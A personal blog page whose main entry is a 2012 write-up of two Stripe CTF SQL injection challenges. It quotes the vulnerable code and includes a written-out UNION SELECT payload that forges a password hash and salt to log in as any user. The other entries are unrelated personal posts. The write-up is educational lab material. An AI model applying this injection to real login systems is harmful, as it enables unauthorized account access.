salt - Dave's Blog

Search
My timeline on Mastodon

Stripe CTF - SQL injections (Levels 0 & 3)

2012 Sep 5, 9:10

Stripe's web security CTF's level 0 and level 3 had SQL injection solutions described below.

Level 0

Code

app.get('/*', function(req, res) {
var namespace = req.param('namespace');

if (namespace) {
var query = 'SELECT * FROM secrets WHERE key LIKE ? || ".%"';
db.all(query, namespace, function(err, secrets) {

Issue

There's no input validation on the namespace parameter and it is injected into the SQL query with no encoding applied. This means you can use the '%' character as the namespace which is the wildcard character matching all secrets.

Notes

Code review red flag was using strings to query the database. Additional levels made this harder to exploit by using an API with objects to construct a query rather than strings and by running a query that only returned a single row, only ran a single command, and didn't just dump out the results of the query to the caller.

Level 3

Code

@app.route('/login', methods=['POST'])
def login():
username = flask.request.form.get('username')
password = flask.request.form.get('password')

if not username:
return "Must provide username\n"

if not password:
return "Must provide password\n"

conn = sqlite3.connect(os.path.join(data_dir, 'users.db'))
cursor = conn.cursor()

query = """SELECT id, password_hash, salt FROM users
WHERE username = '{0}' LIMIT 1""".format(username)
cursor.execute(query)

res = cursor.fetchone()
if not res:
return "There's no such user {0}!\n".format(username)
user_id, password_hash, salt = res

calculated_hash = hashlib.sha256(password + salt)
if calculated_hash.hexdigest() != password_hash:
return "That's not the password for {0}!\n".format(username)

Issue

There's little input validation on username before it is used to constrcut a SQL query. There's no encoding applied when constructing the SQL query string which is used to, given a username, produce the hashed password and the associated salt. Accordingly one can make username a part of a SQL query command which ensures the original select returns nothing and provide a new SELECT via a UNION that returns some literal values for the hash and salt. For instance the following in blue is the query template and the red is the username injected SQL code:

SELECT id, password_hash, salt FROM users WHERE username = 'doesntexist' UNION SELECT id, ('5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8') AS password_hash, ('word') AS salt FROM users WHERE username = 'bob' LIMIT 1
In the above I've supplied my own salt and hash such that my salt (word) plus my password (pass) hashed produce the hash I provided above. Accordingly, by providing the above long and interesting looking username and password as 'pass' I can login as any user.

Notes

Code review red flag is again using strings to query the database. Although this level was made more difficult by using an API that returns only a single row and by using the execute method which only runs one command. I was forced to (as a SQL noob) learn the syntax of SELECT in order to figure out UNION and how to return my own literal values.

PermalinkCommentssecurity sql sql-injection technical web-security

Bitter Chocolate Beer Bottle

2010 Jul 16, 6:43

PermalinkCommentsbear beer bottle salt wa issaquah

I Love Local Commercials - Sponsored by MicroBilt Corporation

2009 Nov 5, 2:07Two guys sponsored by MicroBilt to travel around the country and make totally awesome commercials for local companies. Includes such gems as Salt Lake Community Barbering & Cosmetology School: "Your hairdo is only limited by your immagination. And how far along we are in the semester.", as well as Cullman Liquidation: "They're used. Some of them have stains. We cover that up."PermalinkCommentsvia:boingboing video advertising commercial tv monthly

Birthday Weekend

2008 Sep 4, 11:30

A photo of the Seattle skyline in the distance over water.This past weekend Sarah and I went to Salty's on Alki. I had never been down to the Alki area so that was fun and I took a few photos while we were there. It turns out they were the last few photos I'll be taking with that camera as it turned itself on in my pocket and the lens extension mechanism broke for the inner most lens. So now I'm looking for a new camera, preferably one that has a lock mechanism so I can't accidentally turn it on in my pocket. The dinner was good and Salty's has a great view. On an unrelated note, the next day we went to an Audi dealership and test-drove the new 2009 A4 which was fun. I'm happy with my car but Sarah's feeling antsy.

PermalinkCommentsalki rambling camera weekend birthday nontechnical

Weekend Humor

2007 Mar 13, 8:16Over the weekend I went with Jon and Sarah to see Zach Galifianakis perform at The Moore who was awesome of course. I hadn't been to The Moore before but it was very cool. The space is very vertical with two levels of balconies making it seem small in the other dimensions. We were on the middle level so when Zach climbed off the stage to talk to the audience we couldn't see him.

Before the show we ate at The Steelhead Diner. I enjoyed my chicken sandwhich but the place seemed a little full of itself with salt and pepper that had been infused with this and that. At any rate it had a nice atmosphere and good food which I suppose is the point.

The opening act for Zach was another comedian whose name I don't recall. He was pretty funny but seemed to do just a tad too much pandering to the Seattle audience. "The administration should do something different than what they're doing currently!" *Audience Cheers* is sort of equivalent to "Its great to be here in... Seattle!" *Audience Cheers*.PermalinkCommentspersonal seattle nontechnical
Older Entries Creative Commons License Some rights reserved.